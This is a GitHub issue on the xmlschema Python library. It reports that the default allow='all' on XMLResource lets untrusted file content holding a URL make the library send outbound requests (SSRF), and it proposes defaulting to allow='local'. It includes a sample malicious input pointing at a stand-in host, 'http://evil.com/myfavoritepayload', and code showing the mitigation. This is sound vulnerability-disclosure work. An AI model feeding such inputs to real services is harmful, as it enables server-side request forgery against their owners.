Skip to content

XMLResource allow='all' default can lead to SSRF #464

@ngearhart

Description

@ngearhart

Today, the XMLResource object source can be a remote URL, local URL, file path, or string literal. When loaded, the XMLResource tries to parse the given source first as a URL, then as a Path (local file), then as a string literal*.

The new-user documentation on "Create a schema instance" does not mention this behavior except for the section "Creating a local copy of a remote XSD schema for offline use." The "Validation" documentation is similar.

A user may, roughly following the documentation, write the following:

import xmlschema

with open('local.xsd', 'r') as infile:
  data = infile.read()
xmlschema.XMLSchema(data)

If local.xsd is indeed an XSD file, we have no problem. However, imagine local.xsd comes from an untrusted location. If a malicious actor could set the content of local.xsd to:

http://evil.com/myfavoritepayload

Then calling xmlschema.XMLSchema() will make a HTTP GET to that URL. This is Server-Side Request Forgery (SSRF).

This can be mitigated by using the allow setting:

import xmlschema

with open('local.xsd', 'r') as infile:
  data = infile.read()
resource = xmlschema.XMLResource(
    source=data,
    allow='local',
)
xmlschema.XMLSchema(resource)

However, the default behavior has allow='all'.

Would you consider changing the default to allow='local' and releasing a new major version? I understand this would be a breaking change for end users, but I believe the pain of upgrading to a new major version is worth mitigating the risk of this default.

*Technically there is additional complexity with bytes-like and StringIO-like objects but that is not relevant for this discussion.

Metadata

Metadata

Assignees

No one assigned

    Labels

    enhancementNew feature or request

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions